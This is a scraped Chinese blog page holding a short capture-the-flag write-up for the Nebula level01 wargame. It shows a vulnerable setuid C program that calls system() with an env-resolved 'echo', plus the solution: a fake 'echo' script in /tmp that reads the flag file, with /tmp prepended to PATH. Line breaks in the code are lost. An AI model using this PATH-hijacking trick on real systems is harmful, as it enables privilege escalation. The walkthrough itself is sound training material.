i春秋

来源:互联网 发布:神仙劫神翼进阶数据 编辑:程序博客网 时间:2024/05/16 19:08

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){  gid_t gid;  uid_t uid;  gid = getegid();  uid = geteuid();  setresgid(gid, gid, gid);  setresuid(uid, uid, uid);  system("/usr/bin/env echo and now what?");}

Nebula官网

思路

覆盖环境变量PATH中的echo命令

cd /tmpvim echo
cat /home/flag01/flag
chmod 755 echoPATH=/tmp:$PATH/home/flag01/flag01

flag

0 0
原创粉丝点击